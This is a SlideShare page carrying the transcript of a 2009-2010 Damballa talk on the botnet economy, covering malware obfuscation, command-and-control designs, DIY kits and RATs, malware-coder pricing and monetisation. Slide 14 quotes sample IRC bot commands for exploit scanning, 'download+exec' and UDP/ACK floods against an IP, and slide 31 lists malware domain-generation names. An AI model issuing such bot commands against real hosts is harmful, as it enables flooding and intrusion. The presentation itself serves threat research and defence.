Your computer is worth 30 cents - Gunter Ollmann

  • 1,094 views
Uploaded on

In case you haven’t noticed, there’s a war going on. Malware vendors, SEO consultants, exploit pack developers, content delivery specialists and botnet masters are battling for control of your …

In case you haven’t noticed, there’s a war going on. Malware vendors, SEO consultants, exploit pack developers, content delivery specialists and botnet masters are battling for control of your computer. They’re not battling you or the security systems you’ve deployed – they won that war quite some time ago. No, they’re battling each other over who gets to own your computer – and consequently who gets to make money from it.

The botnet ecosystem is evolving at a rapid pace. Specialized services have come to fill every niche of the hacking world. The frontline is rarely the mechanical process of exploitation and infection – instead it lies with innovative 24x7 support and heldpdesk ticketing systems – quality of service is the competitive edge. How much is your computer worth to them? The price point is dropping day-by-day, but 30 cents is a pretty average trade value. Why is it so low? Because your computer is only part of the ecosystem – and a commodity one at that.

More in: Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads

Views

Total Views
1,094
On Slideshare
0
From Embeds
0
Number of Embeds
0

Actions

Shares
Downloads
0
Comments
0
Likes
1

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Your Computer Is Worth 30¢ This battle for control of your Gunter Ollmann, Vice President of Research
  • 2. About  Gunter Ollmann • VP of Research, Damballa Inc.  Damballa Inc. • Atlanta based security company focused on enterprise detection and mitigation of botnets  Brief Bio: • Been in IT industry for two decades Built and run international pentest teams, R&D groups and consulting practices around the world. • Formerly Chief Security Strategist for IBM, Director of X-Force for ISS, Professional Services Director for NGS Software, Head of Attack Services EMEA, etc. • • http://blog.damballa.com & http://technicalinfodotnet.blogspot.com/ Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 3. Perspective… Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 4. Targeted?  Targeted in what sense? Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 5. Targeted Attacks?  Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 6. Access to the enterprise Purchase from botnet Submit a CV masters 2000 2005 2009 Hand out USB drives Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 7. Different Ways of Looking at the Threat? Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 8. Serial Variants Original Malware Code Metamorphism Noise Insertion Compilers Source-code or DIY Random changes to Insertion of noise Different compilers (and malware creator kit the codes structures instructions and versions) are used to generates original code. and procedures. whitespace commands. generate different code. Noise Insertion Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 9. Cryptors, Packers and Binders Original Malware Cryptors Packers Binders Source-code or DIY Encrypt the malware, so Compress the malware Take the malware and malware creator kit it can only be decrypted to make it small, bind it with(in) other generates original code. in real-time on the host. compact and random innocuous software. QA Automatically run the new malware through AV detection tests. Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 10. Avoiding analysis systems Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 11. Virus Testing Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 12. Bot spreading & Support Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 13. Command & Control Evolution Multi-server Topology High resilience to shut-down Random P2P, etc. Star Topology Common clustering Hierarchical Topology Easy to sell/rent branches Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 14. Botnet Command and Control  IRC Command and Control is still common for botnet management  Command language varies upon nature of botnet Sdbot/Reptilecapabilities Rbots 1: scan.start ms08_067_netapi 25 3 download+exec x.x.x.x 1: .udp 208.43.216.195 1995 999999999999 –s 2: .scan 75 1 201.x.x.x 2 1 201.x.x.x 2: .ddos.ack 208.43.216.195 1995 9999999999999 –s 3: .root.start lsass_445 100 3 0 -r –s …typically used for DDoS …scan hosts within a Class-A for port 443 and attempt to exploit (Conflcker) Sample bot command sequence Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 15. IRC CnC Host Controls Agobot SpyBot SDbot Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 16. Zeus & Distribution 1 2 ZEUS DIY Kit • RRP: $400 (street price ~$50) • Botnet CnC package with Web management frontend. 3 • Very popular – many plug-ins developed to extend functionality Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 17. Sophisticated Management Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 18. Sophisticated Management Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 19. Visibility… Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 20. 1 2 Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 21. Keylogger Octopus 1  Basic DIY kit • Evolution of free kit (incl. source code)  $30 for commercial version 3 2 Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 22. RAT Spy-Net v1.8 2 1 3 4 Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 23. RAT Aero-Rat v0.3 3 1 2 Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 24. RAT Turkojan v4  - Trojan creator  V.4 New features 1 • Remote Desktop • Webcam Streaming • Audio Streaming • Remote passwords • MSN Sniffer • Remote Shell • Advanced File Manager • Online & Offline keylogger • Information about remote computer • Etc.. 2  Three versions • Gold, Silver & Bronze Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 25. RAT PayDay v0.1 1 2 3 4 5 7 6 Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 26. Hire-a-Malware-Coder (Custom Build) Platform: software running on MAC OS to Windows Multitasking: have the capacity to work on multiple projects Speed and responsibility: at the highest level Pre-payment for new customers: 50% of the whole price, 30% pre-pay of the whole price for repeated customers Rates: starting from 100 euros I can also offer you another deal, I will share the complete source code in exchange to access to a botnet with at least 4000 infected hosts because I don't have time to play around with me bot right now. Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 27. Hire-a-malware-coder Pricing  Other models exist for hire-a-malware-coder pricing  Component/functionality based pricing • Loader 300 • FTP & Grabber 150 • Assembler Spam bases 220 • Socks 4/5 70 • Botnet manager 600 • Scripts 70 • Password stealers (IE, MSN, etc.) 70 • AV-remover 70 • Screen-grabber 70 Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 28. Competition… Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 29. Builder Battling  Zeus Worlds most popular malware DIY malware construction kit  Helps clear your system before making the malware Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 30. Battling at the Victims Host  Similar kit to Zeus  Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 31. Dynamic Domain Generation  Designed to thwart domain hijacking/closure Sinowal fhwwhkis.com fhksvbjj.com Bobax/Torpig cfzxkefy.2mydns.net kixxgxhi.com Conficker A/B ozzlcjfwxy.mykgb.com dfhkxefj.biz uavpmphb.zipitover.com jstlzaccs.cc xchtucfx.com ehbcihsg.com nltngl.widescreenhd.tv kupgc.info Conficker C mohuajixthb.afraid.org gyagluso.info bjxqjh.com.sv htiukhwb.com vemogoftiv.zipitover.com ezffoozq.biz dgtqwe.be xddjsvgh.com fwsdqcxozwi.mycoding.com hxqbgkyw.org cnxnp.com.py ivfjxxgf.com iaguaku.afraid.org nxmezijg.info btuutlevt.com.mt icdkvcjf.com pxkakigmdx.mario.org sayklyqfhk.org bmjlezym.com.pe zxeytdqgn.mario.org eplgu.org bynzomen.com.mx hlgkiyogcgs.ws daagsup.com.bo oyvtk.cn cequxn.ca cxcsicbqn.ch dcmrfv.gs Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 32. Blacklisted Researchers Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 33. Hack-back  Curiosity killed the cat • Turn botnet against CnC investigators  Identifying the researcher • Repeated lookup of name servers • Resolution request for CnC host name • Wrong port/protocol in CnC connection • Missing handshake or keys • Identify sandbox/VM being used  Response tactics • DDoS the IP address or netblock • Spam flood the researcher • Exploit and breakout of sandbox/VM • Give different (benign) responses to the researcher Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 34. Value… Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 35.  How to pay  Where to look  Mechanisms for validation of buyer/seller Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 36. Making Money With Botnets  Business Motivators for Bot Masters • Active market for purchase/sell of corporate hosts • $500-$20,000 per host • • Markets for the data stolen from botnet hosts • Authentication credentials and PII • Buy/Selling stolen documents • blackhat • Noisy, high-volume, low profit Spam, DDoS, brute-force • Stealthy click-fraud, corporate identity enumeration • Reputation hijacking • Running blackhat services that leverage corporate reputation Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 37. Buying Botnet Victims Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 38. Worth less than you imagine How much? 1/400th of a cent per 24 hours Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 39. Value-added Services Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 40. Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 41. iFrame Traffic Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 42. Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 43. URL Management Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 44. Lookup Resilience  IP Flux • Single-flux • • Double-flux •  Domain Flux • Domain wildcarding • • Domain generation algorithms • Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 45. Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 46. Umm… Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 47. Conclusions Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 48. Thank You! Gunter Ollmann - VP of Research gollmann@damballa.com WWW – http://www.damballa.com Blog - http://blog.damballa.com Blog - http://technicalinfodotnet.blogspot.com Copyright © 2009-2010 Damballa, Inc. All Rights Reserved